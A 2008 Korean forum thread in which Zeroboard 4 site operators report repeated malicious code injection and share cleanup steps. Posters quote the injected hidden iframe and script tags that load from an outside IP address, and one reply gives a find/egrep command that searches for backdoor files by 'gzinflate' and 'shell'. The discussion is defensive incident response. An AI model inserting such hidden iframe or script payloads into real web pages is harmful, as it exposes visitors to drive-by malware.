ZB4 버그신고 게시판
![[레벨:1]](./modules/point/icons/default/1.gif "포인트:115point (31%), 레벨:1/30"){kind=icon}
김인철517악성 스크립트 로 인한 소스 삽입 공격이 수시로 들어오고 있습니다.
들어오는 데는 현재
lib.php, view.php, zboard.php에 맨위상단에 위치합니다.ㅜㅜ
수시로 들어오는데 처리방법 없을까여.
<iframe src=http://211.115.68.112/Help.htm width=0 height=0></iframe>
들어오는 데는 현재
lib.php, view.php, zboard.php에 맨위상단에 위치합니다.ㅜㅜ
수시로 들어오는데 처리방법 없을까여.
<iframe src=http://211.115.68.112/Help.htm width=0 height=0></iframe>
2008.08.06 16:12:43 (*.145.173.29)
석이..
저도 요즘 이것 때문에 골치가 아픕니다. lib.php 를 통해 공격해 오는거니 이부분 패치하시기 바랍니다. 이부분 패치후에도 들어오긴 했는데 아주 죽겠습니다.. 물론 백도우 찾아 지웠는데두 말이죠..
파일 심어져 있을겁니다. data 디렉토리에 숙주파일 찾아보세요.
근데 패치 했는데두 동일한 방법으로 들어 오더군요.
파일 심어져 있을겁니다. data 디렉토리에 숙주파일 찾아보세요.
근데 패치 했는데두 동일한 방법으로 들어 오더군요.
2008.08.06 20:49:00 (*.222.67.219)
<script src=http://211.115.68.112/G.js></script>
저는 이런식으로 제목에 스크립터가 자동 생성이되여.... 아놔... 지워도지워도.... ㅜ.ㅜ 방법이.....
저는 이런식으로 제목에 스크립터가 자동 생성이되여.... 아놔... 지워도지워도.... ㅜ.ㅜ 방법이.....
2008.08.06 22:29:32 (*.142.127.217)
김인철517
안녕하세요. 답변감사드립니당.
뮤직트로트님 말씀대로 우선 퍼미션 변경을하였습니다.
석이님 data 디렉토리에 어떤파일인지 비슷하게라도 알려주실수없나여. 이거땜시 미티겟어여.ㅜㅜ
참고로 저의 제로보드 버전은 제로보드 4.1 pl8 관리자 페이지입니다.
뮤직트로트님 말씀대로 우선 퍼미션 변경을하였습니다.
석이님 data 디렉토리에 어떤파일인지 비슷하게라도 알려주실수없나여. 이거땜시 미티겟어여.ㅜㅜ
참고로 저의 제로보드 버전은 제로보드 4.1 pl8 관리자 페이지입니다.
2008.08.07 03:31:41 (*.145.173.29)
data 디렉토리에서
find . -name "__zbSessionTMP" -prune -o -name "*.php" -exec egrep 'gzinflate|shell' -l {} \;
이렇게 검색해 보세요.
파일명은 수시로 변경하더라구요.
find . -name "__zbSessionTMP" -prune -o -name "*.php" -exec egrep 'gzinflate|shell' -l {} \;
이렇게 검색해 보세요.
파일명은 수시로 변경하더라구요.
2008.08.07 15:30:35 (*.142.127.217)
김인철517
안녕하세요. 김인철입니다.
제가 2주전인가 주민번호 없이 가입이 간단하게 햇는데요
이런일로도 이런 문제가 발생할수있나영
그리고 어제가지는 lib나 view, _header, zboard.php에 해당코드 잡아서 삭제햇엇는데
오늘부터는 보이지않고 다른데서 나타나는거같습니다. 도무지 알수가없는데 도움좀주실수잇나여..
미티겟어여.ㅜㅜ
제가 2주전인가 주민번호 없이 가입이 간단하게 햇는데요
이런일로도 이런 문제가 발생할수있나영
그리고 어제가지는 lib나 view, _header, zboard.php에 해당코드 잡아서 삭제햇엇는데
오늘부터는 보이지않고 다른데서 나타나는거같습니다. 도무지 알수가없는데 도움좀주실수잇나여..
미티겟어여.ㅜㅜ
![[레벨:4]](./modules/point/icons/default/4.gif "포인트:1445point (64%), 레벨:4/30"){kind=icon}
bell373
2008.08.08 01:26:07 (*.67.31.207)
![[레벨:5]](./modules/point/icons/default/5.gif "포인트:2550point (78%), 레벨:5/30"){kind=icon}
nible
저도 3~5 일전 관련 피해를 입었습니다.
help.zip
우선, zb4의 보안패치는 모두 되어있는 상태에서 입었습니다만...
마지막 최근패치되기전과 비슷한 패턴으로 판단하고 빠르게 대처할 수 있었습니다..
근데, 이상한건 위와같이 zb4의 보안패치를 모두 마무리한상태에서 당했다는점..
뭔가 또 취약점이 있지 않나 생각됩니다.
우선 서버내의 계정 password를 모두 변경하고, 폴더 또는 파일들의 권한을 root로 막고
61.100.1.148 침입자의 ip를 iptables로 막고나서 우선 해결되었습니다.
만약 또다른 취약점이 존재한다면.. 현재의 처방은 임시땜질일지 모르겠습니다..
help.zip
우선, zb4의 보안패치는 모두 되어있는 상태에서 입었습니다만...
마지막 최근패치되기전과 비슷한 패턴으로 판단하고 빠르게 대처할 수 있었습니다..
근데, 이상한건 위와같이 zb4의 보안패치를 모두 마무리한상태에서 당했다는점..
뭔가 또 취약점이 있지 않나 생각됩니다.
우선 서버내의 계정 password를 모두 변경하고, 폴더 또는 파일들의 권한을 root로 막고
61.100.1.148 침입자의 ip를 iptables로 막고나서 우선 해결되었습니다.
만약 또다른 취약점이 존재한다면.. 현재의 처방은 임시땜질일지 모르겠습니다..
저역시 아래 질문에도 올렸듯이 index , main 이란이름을 가진 파일에 악성 스크립트들이 수시로 삽입되기에
답변도없고해서 임시방편으로 퍼미션을 변경하여 사용하고 있습니다
해당파일편집시에만 퍼미션을 644로해두고 편집하고난후 에는 444로 변경해두면 되더군요